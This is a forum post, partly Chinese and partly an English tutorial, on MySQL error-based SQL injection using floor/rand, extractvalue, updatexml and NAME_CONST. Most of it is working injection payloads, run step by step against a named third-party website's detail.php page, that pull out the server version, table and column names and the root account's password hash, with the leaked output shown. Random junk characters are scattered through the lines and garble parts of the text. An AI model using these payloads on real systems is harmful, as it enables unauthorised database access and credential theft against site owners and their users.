|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:0 p: z2 |+ [: H$ _- a* y
首先进行正常查询: mysql> select * from article where id = 1;5 k% i% o( o0 Y C5 k) I
+—-+——-+———+4 X5 w# M- E9 b4 G& C! ?$ Y
| id | title | content |
q; J+ T6 H; V% B+—-+——-+———+
( [- ~' q0 Z0 L, w: b0 i5 \| 1 | test | do it |: H; M+ k" \; o+ w9 Q* c- H' l, g J
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);/ F3 u: d: q, _' b/ G7 Z; D
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。( Z3 z9 m; h5 C! z* o, F
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
7 R. n4 c+ x# L9 X' v- k: mERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2))); O& |4 y6 @9 _# f. {* u( d0 s
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue5 [$ o, u1 K3 Q/ C8 X
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
9 B+ F9 d1 O8 Z; q, qERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
, E) g4 t8 ?1 q) r* u# |( e2 P: y- }. ?7 p+ m1 W
再收集:
, I1 Z7 m7 ]5 C! A7 h! w6 Lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
. F, l' J3 O8 A; b$ }7 v9 n& N0 [
; `# n7 ]! r# r% R9 f3 eError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
4 `/ ?8 p g0 P8 C* g& Y' a; r% {# l: |8 P- ]8 }7 y' o) ]/ y
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
. @7 Y; C, d# Y5 l
( `. \$ D5 Z: s- u& KErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 6 ]$ @+ l( M) ^, o* w9 K
, I k+ S; t8 Q; YMYSQL高版本报错注入技巧-利用NAME_CONST注入" u. A1 | D& N6 J/ R2 l7 J
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 9 B o- G' W9 E6 W
# `; O& N: Z* A1 H0 l
9 W+ u7 ?$ ?0 }: k3 k" K, T0 X相关信息
P2 }) J( b+ `. `# Q0 N- K2 P- f: d4 s
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
+ G0 G& g- E! j6 q4 S0 K; u* | ]9 W, [8 |: \
Code:
) D2 h b/ m7 @# VNAME_CONST(DATA, VALUE)
2 E+ @9 W7 j3 |+ i' u% ?
1 _. ^5 p$ v# G! S( Q- V# V3 P. wReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
& D O! x: I' B+ W+ F; h9 M8 R
2 S- G$ p0 A9 A) N LSELECT NAME_CONST('TEST', 1)- B7 M' m0 Y' \# R
# \+ `) [% j/ ~( }. M6 Z1 G2 T' \( v& q9 ]
8 V7 }6 a+ e: s9 o# e|---------------|7 m4 `' y2 N( q/ v& d, i
| TEST |
4 n( U% G0 O6 P( e3 e7 `| |# W: k7 ~, X: c* U9 W9 g% F+ P
|---------------|; o/ ?" N$ V5 l6 |+ F" ~8 y5 O
| 1 |5 N% `! }4 O, t5 ]1 M0 }: I
| |
* h. L6 `) {3 i l7 N; @ [0 {4 Y|---------------|
1 s- ~- O7 N; `+ p( T& V" I2 d0 Y; L3 t% q: G4 y3 p
5 `8 h0 L' G' ?9 u g: o8 k% ?4 M& o5 J$ x. Y; |2 p0 {+ U
% b, t P8 v1 M uhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
3 V( i# s' F0 d8 r0 hIntro to MySQL Variables! Z) z- [, X. d* G. O
1 w8 C4 T! x2 S$ tOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.$ d1 p' n8 {2 [
. k9 _. C: u& x8 e: Q$ U; ]Code:
e5 B# t' I" M0 {% h9 v0 @- yhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261% K5 f. Z) |: |3 I
" ~# Y: E, c6 A" J9 z) i8 C
& H/ }$ U \6 X, J% s3 @
' b a2 y. n5 K* I' F) c
) H3 r0 n$ c! ~/ \3 @. A- c5 m3 B
' x5 H ~8 l! h! D `- d0 ACode:" X2 t2 ~$ H6 S [- _0 U1 b: R9 t
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
( y6 Y# ?. t/ g& B, G1 d9 ?( \' Q
/ y5 N6 l# S9 _! ]! m7 t5 x
7 r% k' {3 v( ?# _3 p% A5 ?VAR = Your MySQL variable.7 v& U5 W" G8 [4 P& l& _2 y8 {
0 D5 Q7 j% l4 g# L! w
MySQL 5.1.3 Server System Variables6 g* d. N7 l# h( r& p0 N4 q
5 }$ ?; z% p, z5 t9 b* R: nLet's try it out on my site..
7 Q' Y6 c' D3 u
2 E+ x8 L0 V" S' b* ^8 H9 o5 k$ tCode:
8 ^8 h7 j) U a; @5 U8 @& Nhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--, e$ p+ V' ^1 p: I) N/ m* D
5 d) `. ^- `+ z" j) q* X* ZErroruplicate column name '5.0.27-community-nt'0 Q0 D& Z8 x3 y: p9 J% {* ]
& G) d( _/ Y0 O. e k
4 e% J3 a1 \ @* N; B
: S1 j7 c# u! h/ s& M) u0 F/ V! r" ~4 j5 l( ~+ Q+ y8 Z4 l
4 ~7 h1 l" Y ~! {' M
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
p3 m! d% E5 L/ i9 m1 z& D3 w2 @ {" p4 l1 `
Data Extraction% ]" k' j; n) a x! x+ E7 l
' n: m1 e/ i0 [7 ~
Code:
U2 j- x: a9 y3 \/ L8 m. i. u+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--0 v! F9 f! ?% S. l/ }1 [
& {( o2 _0 @! f6 R* w7 K+ W. r
. i& O/ v& b( S$ }! t8 u% uWe should get a duplicate column 1 error...
9 O( {4 D$ [! X( l. M4 `( @3 V- y( f9 j& b+ E T& O$ i1 ^
Code: h7 U9 Q! R: q3 r1 t1 b# ]
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
) l; c( B# s8 I4 R; B/ E+ S; `% x
Erroruplicate column name '1+ Y0 Y: Y* o* {( X4 ?! y/ T
7 G: y* H0 |, A& ?+ b' F
$ k6 }( k7 i: U
: ^: ~8 N h4 d% L$ @, G: N) P8 S2 O4 d5 ~/ A b
* R0 V/ ]) {# o- Y9 m% s
. g$ t& {* a, P$ Y4 Z2 I
Now let's get the tables out this bitch..
+ o+ _" u1 V( [ J: `* U
9 y8 P. X5 ?5 j/ {! M' z) u/ lCode:
d5 R( r7 v6 |9 c- H7 R/ s0 x+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--. v; y. |# O. v0 R
& }0 c* d8 R" _7 ]3 j( q) B$ c& W: l. C$ U: ]3 n
Let's see if it works here, if it does, we can go on and finish the job.
) D D/ }+ p" l' a p$ T( ^0 Y9 D; {
6 W8 w( \ G# I S0 ]+ BCode:, ] I7 S b& G: t4 j! p) r- t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ \$ A. r7 C. _1 k I7 J3 J6 V, U& X. { j1 n! u. N' x
. O" ]1 h4 a. m+ l
Erroruplicate column name 'com_admanage" e' b6 Z9 ^5 C" b3 n% i
0 V7 O$ w3 N/ v* ?/ A
0 A& K/ Q2 H8 x, ?* q4 D$ S, s( y
. C6 A1 o1 z; G3 k
9 w Y- f' x* d* r9 V! L- G' g9 N# p9 m* y x
) |. o1 e! P- A" o; j Z% ONow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
$ ^2 p: _; a8 t. A) y
6 f) N! b* D; \, VLet's get the columns out of the user table..1 g9 r- f3 k! H) Y
$ q+ A% [6 p$ O' L8 `& I f i
Code:6 o$ ?2 S$ {, Q( `
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
6 }5 Y9 J# L# D9 Q3 X8 L/ D; ^& z# `% H0 n! k2 j7 V e! p
" H( `1 L7 G! I M- L/ sSo mine looks like this, and I get the duplicate column name 'Host'.1 |6 q. C p, {. Z6 z, Q
* o1 j1 h: a3 q5 B5 x
Code:$ W3 ~: \1 n+ y4 D( A( n
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
; ~8 @. s2 _. S" @
2 R! l) P1 S) \3 p( d" @Erroruplicate column name 'Host'& D; {9 ^# }' ?* y. d! o! C- K
: U' P% K$ b6 Y! `7 n4 C0 M
) D: X2 b3 e8 N/ H+ [9 h# Z* _" L8 s/ m
" U! V1 q0 ~% O, ^# R; Y1 S
( h6 Z5 X& t; D/ C8 G4 a% J
' r X. R' | u. Z' oWoot, time to finish this bitch off.
( O" i5 `$ K8 p. u1 t5 s0 y. i; S: q( A! {8 P
Code:+ D; m& G# ^3 \7 p3 f8 D% C! ^7 L; I; C+ p
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--' v2 ?8 s' ?; W! U" Z, j
, Q+ a& d2 s' m5 a: n8 G/ \% d F A1 n
So mine looks like this...
# W$ v* m/ |0 e* e+ v3 p
1 n: c7 P! ~/ J! s4 q# ICode:
5 l, S; a5 u. @http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--- `; r3 N. o" l# I: v* L
8 e! M, u. g. ^: L1 Z; P
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
( R3 F# \ v' b) B' F
# c0 Q& n5 D0 ]5 l, I
/ E0 v, W' U- l/ X/ J. V
$ i# U" n# V" z) }6 ~8 [0 P+ C/ I
9 \. [2 i. i. H R: n: N/ G( h
8 R. r7 T L2 i& ~( }6 \And there we have it, thanks for reading.
; i! m, E% r4 U6 u' ?. Y5 L/ W$ f9 b$ _! v4 C) L
|
发表于 2015-11-11 19:03:37
收藏
支持
反对